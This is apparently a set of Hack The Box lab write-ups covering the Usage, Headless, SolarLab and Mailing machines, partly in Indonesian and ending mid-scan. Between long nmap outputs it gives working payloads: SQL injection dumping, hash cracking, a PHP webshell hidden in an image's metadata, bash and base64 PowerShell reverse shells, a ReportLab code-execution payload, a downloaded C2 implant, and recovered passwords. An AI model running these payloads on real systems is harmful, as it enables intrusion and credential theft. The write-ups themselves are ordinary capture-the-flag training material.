|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/21%OT=22%CT=%CU=34514%PV=Y%DS=2%DC=T%G=N%TM=664BCBA6
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11
OS:NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Uptime guess: 42.218 days (since Tue Apr 9 00:02:51 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 51.32 ms 10.10.14.1
2 51.48 ms 10.129.36.167

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 21 05:16:06 2024 -- 1 IP address (1 host up) scanned in 9.89 seconds

testing all features. we know sqli in the /forgot_password

Blind sqli boolean based in /forgot_password on port 80 in the email section

sqlmap -r ~/Desktop/Prod/HackTheBox/machine/Usage/req.txt --batch --level 5 --risk 3 --dbms=mysql --dbs --dump

got the dump of all db

lets input to password cracker

john Administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whatever1 (?)
1g 0:00:00:04 DONE (2024-05-21 06:56) 0.2347g/s 380.2p/s 380.2c/s 380.2C/s runescape..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completed

after sometimes

we know this laravel-admin. now we find the public cve for this and i search "laravel-admin cve" and i found this CVE-2023-24249

convert -size 25x25 xc:none -colors 256 output.png && exiftool -Model='<?=system($_GET["x"])?>' output.png && mv output.png $(cat /proc/sys/kernel/random/uuid).png

after that we upload and intercept and make it .png.php

and we get the shell

and then we revshell

http://admin.usage.htb/uploads/images/exploit.png.php?x=bash%20-c%20%22sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.45%2F1337%200%3E%261%22

and then we go to /home/dash and we get user flag

Last updated 4 months ago

Page 3

as always we scan the port and identify them.

this is my recon tools & command that i used

sudo masscan '-p1-65535,U:1-65535' 10.129.36.41 '--rate=1000' -e tun0
[sudo] password for replican:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-05-18 05:39:02 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.129.36.41
Discovered open port 5000/tcp on 10.129.36.41

after we know the port we scan using nmap

sudo nmap -p '80, 5000' -sVSC -A -oN nmap_detailed_all_tcp_ports.txt 10.129.36.41 -v2
[sudo] password for replican:
Starting Nmap 7.95 ( https://nmap.org ) at 2024-05-18 21:58 WIB
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:58
Completed NSE at 21:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:58
Completed NSE at 21:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:58
Completed NSE at 21:58, 0.00s elapsed
Initiating Ping Scan at 21:58
Scanning 10.129.36.41 [4 ports]
Completed Ping Scan at 21:58, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:58
Completed Parallel DNS resolution of 1 host. at 21:58, 0.05s elapsed
Initiating SYN Stealth Scan at 21:58
Scanning 10.129.36.41 [2 ports]
Discovered open port 5000/tcp on 10.129.36.41
Completed SYN Stealth Scan at 21:58, 0.09s elapsed (2 total ports)
Initiating Service scan at 21:58
Scanning 1 service on 10.129.36.41
Completed Service scan at 21:58, 6.21s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.129.36.41
Initiating Traceroute at 21:58
Completed Traceroute at 21:58, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:58
Completed Parallel DNS resolution of 2 hosts. at 21:58, 0.04s elapsed
NSE: Script scanning 10.129.36.41.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:58
Completed NSE at 21:58, 1.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:58
Completed NSE at 21:59, 0.20s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:59
Completed NSE at 21:59, 0.00s elapsed
Nmap scan report for 10.129.36.41
Host is up, received echo-reply ttl 63 (0.044s latency).
Scanned at 2024-05-18 21:58:50 WIB for 10s

PORT STATE SERVICE REASON VERSION
80/tcp closed http reset ttl 63
5000/tcp open http syn-ack ttl 63 Werkzeug httpd 2.2.2 (Python 3.11.2)
| http-methods:
|_ Supported Methods: HEAD GET OPTIONS
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
|_http-title: Under Construction
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/18%OT=5000%CT=80%CU=34143%PV=Y%DS=2%DC=T%G=Y%TM=6648
OS:C234%P=x86_64-pc-linux-gnu)SEQ(SP=F7%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CS
OS:T11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Uptime guess: 29.290 days (since Fri Apr 19 15:01:20 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=247 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 50.28 ms 10.10.14.1
2 50.36 ms 10.129.36.41

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:59
Completed NSE at 21:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:59
Completed NSE at 21:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:59
Completed NSE at 21:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.49 seconds
 Raw packets sent: 38 (2.458KB) | Rcvd: 22 (1.594KB)

after we know port 5000 open we scan using dirsearch

dirsearch -u http://10.129.36.41:5000
/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
 from pkg_resources import DistributionNotFound, VersionConflict

 _|. _ _ _ _ _ _|_ v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11723

Output: /home/replican/Desktop/Prod/HackTheBox/machine/Headless/reports/http_10.129.36.41_5000/__24-05-18_22-02-29.txt

Target: http://10.129.36.41:5000/

[22:02:29] Starting:
[22:04:16] 401 - 317B - /dashboard
[22:05:50] 200 - 2KB - /support

Task Completed

after we know /dashboard cant access ( it said unaothorized ) we go to the /support

after a while i notice the site is using cookies also

like usual ctf chall ( cookie, admin page, form without uploading any files) = xss

we directly put our payload xss but got blocked hmm

but our user agent also got reflected. so we can inject our user agent using burpsuite and input our payload xss to steal the cookie ( we assume in the backend the admin auto check our form )

as we see our payload work perfectly. now we opening server using http.server python to see the log requests

after sometimes. we get a response of the cookie admin.

after that we go into the dashboard and use command injection vulnerability ( because there is word system ) we assume this is command

and yep its command injection when we do ;ls the list of file appeared

directly to revshells

and we get the flag user.

because this is a linux also this is was easy machine i still use c2 framework sliver like usual.

first we see the mail

as we see we need to find system check script and ( create the database init script )

after that we use this

we have acess to sudo binary syscheck that is the inside searching script initdb.sh. we can simply make /bin/bash is root script and call it initdb.sh. and we call syscheck with sudo.

after we put our payload we run the syscheck and ( dont forget to create a listener )

and we get the flag.

Last updated 4 months ago

Page 4

sudo masscan -p1-65535,U:1-65535 10.129.44.43 --rate=1000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-05-15 22:36:28 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 6791/tcp on 10.129.44.43
Discovered open port 139/tcp on 10.129.44.43
Discovered open port 445/tcp on 10.129.44.43
Discovered open port 135/tcp on 10.129.44.43
Discovered open port 80/tcp on 10.129.44.43
rate: 0.00-kpps, 100.00% done, waiting -33-secs, found=5

sudo nmap -p '6791, 139, 445, 135, 80' -sVSC -A -oN nmap_detailed_all_tcp_ports.txt 10.129.44.43 -v2
[sudo] password for replican:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-16 05:40 WIB
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
Initiating Ping Scan at 05:40
Scanning 10.129.44.43 [4 ports]
Completed Ping Scan at 05:40, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 05:40
Scanning solarlab.htb (10.129.44.43) [5 ports]
Discovered open port 6791/tcp on 10.129.44.43
Discovered open port 135/tcp on 10.129.44.43
Discovered open port 139/tcp on 10.129.44.43
Discovered open port 80/tcp on 10.129.44.43
Discovered open port 445/tcp on 10.129.44.43
Completed SYN Stealth Scan at 05:40, 0.06s elapsed (5 total ports)
Initiating Service scan at 05:40
Scanning 5 services on solarlab.htb (10.129.44.43)
Completed Service scan at 05:40, 11.17s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against solarlab.htb (10.129.44.43)
Retrying OS detection (try #2) against solarlab.htb (10.129.44.43)
Initiating Traceroute at 05:40
Completed Traceroute at 05:40, 0.05s elapsed
Initiating Parallel DNS resolution of 1 host. at 05:40
Completed Parallel DNS resolution of 1 host. at 05:40, 0.04s elapsed
NSE: Script scanning 10.129.44.43.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:40
NSE Timing: About 99.86% done; ETC: 05:41 (0:00:00 remaining)
Completed NSE at 05:41, 40.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:41
Completed NSE at 05:41, 0.20s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:41
Completed NSE at 05:41, 0.00s elapsed
Nmap scan report for solarlab.htb (10.129.44.43)
Host is up, received echo-reply ttl 127 (0.039s latency).
Scanned at 2024-05-16 05:40:42 WIB for 56s

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx 1.24.0
|_http-title: SolarLab Instant Messenger
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
6791/tcp open http syn-ack ttl 127 nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94%E=4%D=5/16%OT=80%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=66453A22%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=U)
OPS(O1=M53CNW8NNS%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 19797/tcp): CLEAN (Timeout)
| Check 2 (port 46928/tcp): CLEAN (Timeout)
| Check 3 (port 17281/udp): CLEAN (Timeout)
| Check 4 (port 59848/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-15T22:41:01
|_ start_date: N/A

TRACEROUTE (using port 6791/tcp)
HOP RTT ADDRESS
1 39.81 ms 10.10.14.1
2 40.15 ms solarlab.htb (10.129.44.43)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:41
Completed NSE at 05:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:41
Completed NSE at 05:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:41
Completed NSE at 05:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.15 seconds
 Raw packets sent: 93 (7.776KB) | Rcvd: 34 (2.080KB)

after all scan in http port using dirsearch we found nothing usefull. so continue

echo '10.129.44.43 solarlab.htb report.solarlab.htb' | sudo tee -a /etc/hosts

after many, afterall we can login smb using anonymous credentials

smbclient -L 10.129.44.43 -U anonymous
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\anonymous]:

	Sharename Type Comment
	--------- ---- -------
	ADMIN$ Disk Remote Admin
	C$ Disk Default share
	Documents Disk
	IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available

smbclient \\\\10.129.44.43\\Documents
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\replican]:
Try "help" to get a list of possible commands.
smb: \> ls
 . DR 0 Fri Apr 26 21:47:14 2024
 .. DR 0 Fri Apr 26 21:47:14 2024
 concepts D 0 Fri Apr 26 21:41:57 2024
 desktop.ini AHS 278 Fri Nov 17 17:54:43 2023
 details-file.xlsx A 12793 Fri Nov 17 19:27:21 2023
 My Music DHSrn 0 Fri Nov 17 02:36:51 2023
 My Pictures DHSrn 0 Fri Nov 17 02:36:51 2023
 My Videos DHSrn 0 Fri Nov 17 02:36:51 2023
 old_leave_request_form.docx A 37194 Fri Nov 17 17:35:57 2023

 7779839 blocks of size 4096. 1893544 blocks available
smb: \> dir
 . DR 0 Fri Apr 26 21:47:14 2024
 .. DR 0 Fri Apr 26 21:47:14 2024
 concepts D 0 Fri Apr 26 21:41:57 2024
 desktop.ini AHS 278 Fri Nov 17 17:54:43 2023
 details-file.xlsx A 12793 Fri Nov 17 19:27:21 2023
 My Music DHSrn 0 Fri Nov 17 02:36:51 2023
 My Pictures DHSrn 0 Fri Nov 17 02:36:51 2023
 My Videos DHSrn 0 Fri Nov 17 02:36:51 2023
 old_leave_request_form.docx A 37194 Fri Nov 17 17:35:57 2023

 7779839 blocks of size 4096. 1893544 blocks available
smb: \> get details-file.xlsx
getting file \details-file.xlsx of size 12793 as details-file.xlsx (64.7 KiloBytes/sec) (average 64.7 KiloBytes/sec)
smb: \> exit

dan kita juga bisa meng enumerate smb user dengan ini dgn cara :

crackmapexec smb solarlab.htb -u anonymous -p '' --rid-brute
SMB 10.129.44.43 445 SOLARLAB [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.129.44.43 445 SOLARLAB [+] solarlab\anonymous:
SMB 10.129.44.43 445 SOLARLAB 500: SOLARLAB\Administrator (SidTypeUser)
SMB 10.129.44.43 445 SOLARLAB 501: SOLARLAB\Guest (SidTypeUser)
SMB 10.129.44.43 445 SOLARLAB 503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB 10.129.44.43 445 SOLARLAB 504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.44.43 445 SOLARLAB 513: SOLARLAB\None (SidTypeGroup)
SMB 10.129.44.43 445 SOLARLAB 1000: SOLARLAB\blake (SidTypeUser)
SMB 10.129.44.43 445 SOLARLAB 1001: SOLARLAB\openfire (SidTypeUser)

nah sehabis kita dapetin file xlsx dan juga username yang ada. kita buka file xlsx nya ternyata mendapatkan berbagai password credentials

nah setelah kita dapetin creds, cobain ke subdomainnya http://report.solarlab.htb:6791

setelah mencoba beberapa username dari smb dan password dari xlsx nya saya menemukan bahwa creds yg tepat yakni

BlakeB:ThisCanB3typedeasily1@

bagaimana saya tau usernamenya ini? kita bisa enumerasi pada username yang di file xlsx yang benar hanya 2 yakni Huruf besar diawal dan akhir.

habis kita berhasil login

nah sehabis itu kita tinggal test2 fiturnya

setelah saya test2 fitur generate pdfnya berfungsi dan saya download pdfnya. untuk enumerasi lebih lanjut

ternyata pas kita exiftools kita tau generate pdf nya pakai ReportLab generated PDF document -- digest (http://www.reportlab.com)

nah lgsg pakai exploit ini https://github.com/c53elyas/CVE-2023-33733/tree/master

tapi disitu exploitnya naruh di file baru. kita tinggal ambil payloadnya aja trs masukin di subject / bodynya

<para>
 <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA1ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
 exploit
 </font>
 </para>

disini saya memakai revshell powershell karna ini command injection

Enumeration & Persistence

jadi pertama kita persistencekan dlu biar enak. disini aku pakai Sliver. kalian bisa pakai c2 framework favorit kalian.

tldr yg ku gunain

- attacker - 
sliver > http --lport 1337
sliver > http --lport 1338
sliver > generate --http 10.10.14.45:1338 --save /tmp/
cd /tmp/ && python3 -m http.server 8000

- victim - 
curl -O v.exe http://10.10.14.45:8000/any.exe
./v.exe

dan bs diliat disini ada proccess sus yg jalan openfire-service. lgsg aja kita cek listen nya

kita lgsg aja nyalain proxy. dan connectin ke terminal kita ( proxychains ) dan browser kita, smartproxy

lgsg gas. eh iya lupa kenapa kita kok ngincer si openfire ini karna si openfire ini dijalanin oleh system

dengan informasi2 diatas dan mendapatkan versi dari technya kita dapat searching exploitnya hehehe

nah dapet deh. tinggal pakai, jgn lupa dipahami juga skid

dapet user passnya lgsg aja up plugin rce sesuai instruksi.

setelah kita dapet openfire user. kita dapet liat di db file openfire ( ketika rooting / enumerating ) selalu cek db file

db openfire ini sendiri ada di Programfiles embedded-db C:\Program Files\Openfire\embedded-db

INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)

kita dapet credentials admin dan password key untuk dec dari hash ini.

untuk dec openfire password enc ini bs searching aja pasti nemu

dapet deh

java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)

lgsg aja coba pw ini ke administrator

dan berhasil dapet root access.

Page 5

Mailing Windows · Easy

• Cracking hash password of the hMailServer admin email creds

• zero click account leak outlook

• LibreOffice CVE-2023-2255

pertama kita scan pakai nmap ipnya

# Nmap 7.94 scan initiated Thu May 16 02:37:04 2024 as: nmap -sC -sV --verbose -oN reports_10.129.231.40 10.129.231.40
Nmap scan report for 10.129.231.40
Host is up (0.064s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
| date: 2024-05-15T19:37:36
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
